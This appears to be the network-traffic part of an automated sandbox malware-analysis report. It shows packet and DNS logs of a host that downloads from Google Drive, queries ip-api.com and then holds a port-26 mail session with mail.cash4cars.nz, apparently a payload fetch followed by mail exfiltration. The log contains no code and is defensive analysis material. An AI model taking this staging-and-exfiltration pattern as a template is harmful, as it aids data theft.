                                                                          Apr 24, 2024 06:47:00.028388977 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.028476954 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.028502941 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.028574944 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.035640955 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.035756111 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.035773039 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.035840034 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.042805910 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.042936087 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.042953968 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.043035030 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.047696114 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.047770977 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.047791958 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.047832012 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.052334070 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.052407980 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.052423954 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.052462101 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.056665897 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.056739092 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.056755066 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.056797028 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.061305046 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.061372042 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.061388016 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.061430931 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.065969944 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.066068888 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.066086054 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.066205025 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.070149899 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.070213079 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.070229053 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.070267916 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.070276022 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.070307970 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.074423075 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.074486971 CEST49712443192.168.2.9142.251.2.132
Apr 24, 2024 06:47:00.074660063 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.074702024 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.078659058 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.078742981 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.078758001 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.078857899 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.083064079 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.083161116 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.083178043 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.083235025 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.087116957 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.087210894 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.089226961 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.089286089 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.089301109 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.089340925 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.093591928 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.093687057 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.093700886 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.093780041 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.097498894 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.098520994 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.098531961 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.098596096 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.101515055 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.101567984 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.101578951 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.101624012 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.105556965 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.105607033 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.105616093 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.105654955 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.109404087 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.109478951 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.109488964 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.109577894 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.113642931 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.113701105 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.113713026 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.113770008 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.117309093 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.117405891 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.117417097 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.117511988 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.120932102 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.121001959 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.121011972 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.121051073 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.125066996 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.125149965 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.125159979 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.125246048 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.128321886 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.128408909 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.128417969 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.128487110 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.131937027 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.132019997 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.132030964 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.132116079 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.135632992 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.135720015 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.137403011 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.137459040 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.137480021 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.137518883 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.140897989 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.140954971 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.140965939 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.141002893 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.144682884 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.144741058 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.144757032 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.144800901 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.147917986 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.148009062 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.148021936 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.148125887 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.151405096 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.151462078 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.151475906 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.151515007 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.154957056 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.155035973 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.155076981 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.155134916 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.158423901 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.158477068 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.158488035 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.158528090 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.161767960 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.161849976 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.161859989 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.161906958 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.165146112 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.165282011 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.165294886 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.165379047 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.168592930 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.168685913 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.168694973 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.168768883 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.172003984 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.172085047 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.172094107 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.172168016 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.175389051 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.175498962 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.175509930 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.175574064 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.179275990 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.179377079 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.180545092 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.180630922 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.180645943 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.180712938 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.183957100 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.184016943 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.184027910 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.184068918 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.187041044 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.187105894 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.187133074 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.187175989 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.190741062 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.190802097 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.190814018 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.190851927 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.194031000 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.194097996 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.194108009 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.194144011 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.196394920 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.196460962 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.196470022 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.196508884 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.199299097 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.199367046 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.199404955 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.199445009 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.203033924 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.203093052 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.203100920 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.203139067 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.205405951 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.205460072 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.205475092 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.205516100 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.208539009 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.208590031 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.208600044 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.208636045 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.211812019 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.211858988 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.211868048 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.211909056 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.211915016 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.211955070 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.214659929 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.214711905 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.214720964 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.214761972 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.217730045 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.217783928 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.219345093 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.219398022 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.219419003 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.219455957 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.222395897 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.222448111 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.222457886 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.222496986 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.225558996 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.225603104 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.225620985 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.225653887 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.228173018 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.228233099 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.228240967 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.228276968 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.230792046 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.230856895 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.230865955 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.230901957 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.233577013 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.233624935 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.233633995 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.233669996 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.236258984 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.236314058 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.236352921 CEST  443    49712  142.251.2.132   192.168.2.9
Apr 24, 2024 06:47:00.236366987 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.236398935 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.236427069 CEST  49712  443    192.168.2.9     142.251.2.132
Apr 24, 2024 06:47:00.733684063 CEST  49714  80     192.168.2.9     208.95.112.1
Apr 24, 2024 06:47:00.893285990 CEST  80     49714  208.95.112.1    192.168.2.9
Apr 24, 2024 06:47:00.893529892 CEST  49714  80     192.168.2.9     208.95.112.1
Apr 24, 2024 06:47:00.893723965 CEST  49714  80     192.168.2.9     208.95.112.1
Apr 24, 2024 06:47:01.053816080 CEST  80     49714  208.95.112.1    192.168.2.9
Apr 24, 2024 06:47:01.098273039 CEST  49714  80     192.168.2.9     208.95.112.1
Apr 24, 2024 06:47:03.454669952 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:03.775980949 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:03.776858091 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:09.306396961 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:09.306626081 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:09.627837896 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:09.628130913 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:09.951370001 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:09.953587055 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:10.287724018 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:10.287919998 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:10.287938118 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:10.287976027 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:10.318593979 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:10.640249968 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:10.647492886 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:10.968452930 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:10.968943119 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:11.291812897 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:11.292148113 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:11.624841928 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:11.625283003 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:11.946372986 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:11.953622103 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:12.275340080 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:12.275629997 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:12.660677910 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:12.853863001 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:12.853948116 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:12.981739998 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:12.985340118 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:12.985389948 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:12.985419035 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:12.985435009 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:13.306242943 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:13.306360960 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:13.306396008 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:13.306428909 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:13.317148924 CEST  26     49715  114.142.162.17  192.168.2.9
Apr 24, 2024 06:47:13.363776922 CEST  49715  26     192.168.2.9     114.142.162.17
Apr 24, 2024 06:47:50.910259962 CEST  80     49714  208.95.112.1    192.168.2.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 24, 2024 06:46:07.642513990 CEST | 53864 | 53 | 192.168.2.9 | 1.1.1.1
Apr 24, 2024 06:46:07.796128035 CEST | 53 | 53864 | 1.1.1.1 | 192.168.2.9
Apr 24, 2024 06:46:08.604441881 CEST | 63126 | 53 | 192.168.2.9 | 1.1.1.1
Apr 24, 2024 06:46:08.757863045 CEST | 53 | 63126 | 1.1.1.1 | 192.168.2.9
Apr 24, 2024 06:46:57.132405043 CEST | 59290 | 53 | 192.168.2.9 | 1.1.1.1
Apr 24, 2024 06:46:57.285806894 CEST | 53 | 59290 | 1.1.1.1 | 192.168.2.9
Apr 24, 2024 06:47:00.574791908 CEST | 60487 | 53 | 192.168.2.9 | 1.1.1.1
Apr 24, 2024 06:47:00.728956938 CEST | 53 | 60487 | 1.1.1.1 | 192.168.2.9
Apr 24, 2024 06:47:02.641860962 CEST | 52644 | 53 | 192.168.2.9 | 1.1.1.1
Apr 24, 2024 06:47:03.453811884 CEST | 53 | 52644 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 24, 2024 06:46:07.642513990 CEST | 192.168.2.9 | 1.1.1.1 | 0x574e | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:46:08.604441881 CEST | 192.168.2.9 | 1.1.1.1 | 0xeb41 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:46:57.132405043 CEST | 192.168.2.9 | 1.1.1.1 | 0x9106 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:47:00.574791908 CEST | 192.168.2.9 | 1.1.1.1 | 0x703c | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:47:02.641860962 CEST | 192.168.2.9 | 1.1.1.1 | 0x46a4 | Standard query (0) | mail.cash4cars.nz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 24, 2024 06:46:01.930002928 CEST | 1.1.1.1 | 192.168.2.9 | 0x1cf2 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:46:01.930002928 CEST | 1.1.1.1 | 192.168.2.9 | 0x1cf2 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:46:07.796128035 CEST | 1.1.1.1 | 192.168.2.9 | 0x574e | No error (0) | drive.google.com | | 142.250.101.113 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:46:07.796128035 CEST | 1.1.1.1 | 192.168.2.9 | 0x574e | No error (0) | drive.google.com | | 142.250.101.101 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:46:07.796128035 CEST | 1.1.1.1 | 192.168.2.9 | 0x574e | No error (0) | drive.google.com | | 142.250.101.102 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:46:07.796128035 CEST | 1.1.1.1 | 192.168.2.9 | 0x574e | No error (0) | drive.google.com | | 142.250.101.100 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:46:07.796128035 CEST | 1.1.1.1 | 192.168.2.9 | 0x574e | No error (0) | drive.google.com | | 142.250.101.138 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:46:07.796128035 CEST | 1.1.1.1 | 192.168.2.9 | 0x574e | No error (0) | drive.google.com | | 142.250.101.139 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:46:08.757863045 CEST | 1.1.1.1 | 192.168.2.9 | 0xeb41 | No error (0) | drive.usercontent.google.com | | 142.251.2.132 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:46:57.285806894 CEST | 1.1.1.1 | 192.168.2.9 | 0x9106 | No error (0) | drive.google.com | | 142.250.101.113 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:46:57.285806894 CEST | 1.1.1.1 | 192.168.2.9 | 0x9106 | No error (0) | drive.google.com | | 142.250.101.100 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:46:57.285806894 CEST | 1.1.1.1 | 192.168.2.9 | 0x9106 | No error (0) | drive.google.com | | 142.250.101.138 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:46:57.285806894 CEST | 1.1.1.1 | 192.168.2.9 | 0x9106 | No error (0) | drive.google.com | | 142.250.101.139 | A (IP address) | IN (0x0001) | false
